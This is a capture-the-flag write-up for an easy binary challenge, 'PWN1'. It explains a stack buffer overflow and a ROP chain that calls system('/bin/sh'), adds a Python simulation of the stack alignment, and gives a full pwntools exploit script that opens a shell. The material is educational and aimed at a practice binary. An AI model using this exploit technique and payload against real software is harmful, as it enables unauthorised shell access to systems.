PWN1
Description:
binary exploit
Difficulty:
easy
Solve
This challenge is a stack-based buffer overflow with the stack canary disabled, solved with a ROP chain.
Steps to solve:
- Figure out the vulnerability using a decompiler like IDA.
- Participants should notice a buffer of length 10 that receives 170 bytes of input (buffer overflow). Because of frame padding, the saved return address actually sits 40 bytes past the start of the buffer, which is the offset the payload below uses.
- We don't have a win function here, so participants should build a ROP chain to call system("/bin/sh").
- We don't have a libc leak to calculate the addresses of system and "/bin/sh", but both are present in the binary itself (system through its PLT entry, "/bin/sh" as a string in the binary's data), and PIE is disabled, so their addresses are fixed.
- Extract the addresses of system and "/bin/sh" from the binary using GDB or IDA.
- Build the ROP chain and overwrite the saved return address with the payload: pop rdi ; ret to load the "/bin/sh" pointer into rdi, then the address of system.
- Fix the stack alignment (an extra ret gadget in front of the chain) so that system runs without crashing on a misaligned stack: glibc's system uses SSE instructions such as movaps that require rsp to be 16-byte aligned as the ABI guarantees at function entry, and a ROP chain reaches system via ret rather than call, which shifts the alignment by 8.
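To make the chain layout and the alignment rule concrete, here is an added example of mine (not code from the original writeup and not part of the challenge files) that builds the payload with plain struct packing instead of pwntools and then simulates what the CPU does with it, starting at the vulnerable function's ret. It uses the gadget addresses and the 40-byte offset from the writeup; the pops each gadget performs are assumed from the gadget names (pop rdi ; ret and ret), and the simulated address of the saved-return-address slot is constructed for the example, chosen as 8 mod 16 because the ABI has rsp 16-byte aligned before the call that pushed it.

```python
import struct

# Addresses from the writeup. The binary is not PIE, so they are fixed.
SYSTEM_PLT = 0x400520   # system@plt
BINSH_STR = 0x400764    # "/bin/sh" string inside the binary
POP_RDI_RET = 0x400723  # pop rdi ; ret
RET = 0x40050e          # ret
PADDING = 40            # bytes from the buffer start to the saved return address

# Registers each gadget pops before its own `ret`. Assumption: taken from the
# gadget names, not from disassembling the challenge binary.
GADGETS = {
    RET: [],
    POP_RDI_RET: ["rdi"],
}


def p64(value):
    """Pack a 64-bit little-endian value (same layout as pwntools' p64)."""
    return struct.pack("<Q", value)


def build_chain(align_stack=True):
    """Return the ROP chain as a list of qwords in stack order."""
    chain = [RET] if align_stack else []
    chain += [POP_RDI_RET, BINSH_STR, SYSTEM_PLT]
    return chain


def build_payload(chain, padding=PADDING):
    """Padding up to the saved return address, followed by the chain."""
    return b"A" * padding + b"".join(p64(w) for w in chain)


def simulate(chain, ret_slot):
    """Walk the chain the way the CPU would, starting at the vulnerable
    function's `ret`. ret_slot is the address of the saved return address.
    Returns (address we finally land on, registers the chain set, rsp at
    that entry)."""
    regs = {}
    rsp = ret_slot
    i = 0
    while True:
        target = chain[i]
        rsp += 8  # the ret that transferred control popped this word
        if target not in GADGETS:
            return target, regs, rsp  # a real function, e.g. system@plt
        for reg in GADGETS[target]:
            i += 1
            regs[reg] = chain[i]
            rsp += 8  # each pop consumes one qword
        i += 1  # the gadget's own ret takes the next qword as rip


def entry_aligned(rsp):
    """System V AMD64 ABI: at function entry rsp + 8 is a multiple of 16
    (the caller aligned rsp to 16, then `call` pushed the return address).
    glibc's system() relies on this for its movaps stack accesses."""
    return (rsp + 8) % 16 == 0


def check(chain, ret_slot):
    """Summarise where a chain lands and whether system would be happy."""
    target, regs, rsp = simulate(chain, ret_slot)
    return {
        "target": target,
        "rdi": regs.get("rdi"),
        "rsp_mod_16": rsp % 16,
        "aligned": entry_aligned(rsp),
    }


if __name__ == "__main__":
    # Constructed slot address: the saved return address normally lives at an
    # address that is 8 mod 16, because rsp was 16-aligned before the call.
    SLOT = 0x7FFCDEADBEE8
    for name, chain in (("with ret", build_chain(True)),
                        ("without ret", build_chain(False))):
        print(name, check(chain, SLOT), len(build_payload(chain)), "bytes")
```

Running it shows the two cases side by side: with the extra ret the chain reaches system@plt with rdi pointing at "/bin/sh" and rsp at 8 mod 16 (aligned), without it rsp lands at 0 mod 16 and system would fault on its first movaps. If your own chain fails with a SIGSEGV inside system even though the gadgets look right, this alignment check is the first thing to run.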
I got the pop_rdi and ret gadgets by running these two commands:
ROPgadget --binary main | grep "ret"
And got the address 0x40050e.
As for the pop rdi:
ROPgadget --binary main | grep "pop rdi"
Then, with the pwntools module, we can build a Python script that sends the payload, gets an interactive shell and reads flag.txt.
I wrote this Python script for this task:
from pwn import *

# Fixed addresses: the binary is not PIE
system = 0x400520                 # system@plt
binsh = 0x400764                  # "/bin/sh" string inside the binary
pop_rdi = 0x0000000000400723      # pop rdi ; ret
ret_gadget = 0x000000000040050e   # ret

p = process("./main")
#p = remote("127.0.0.1", 9032)

payload = b""
payload += b"A" * 40              # padding up to the saved return address
payload += p64(ret_gadget)        # stack alignment: shifts rsp by 8 before system is entered
payload += p64(pop_rdi)           # pop rdi ; ret
payload += p64(binsh)             # rdi = "/bin/sh"
payload += p64(system)            # system("/bin/sh")

pause()
p.sendline(payload)
p.interactive()
And I got the shell :D
This post is licensed under CC BY 4.0 by the author.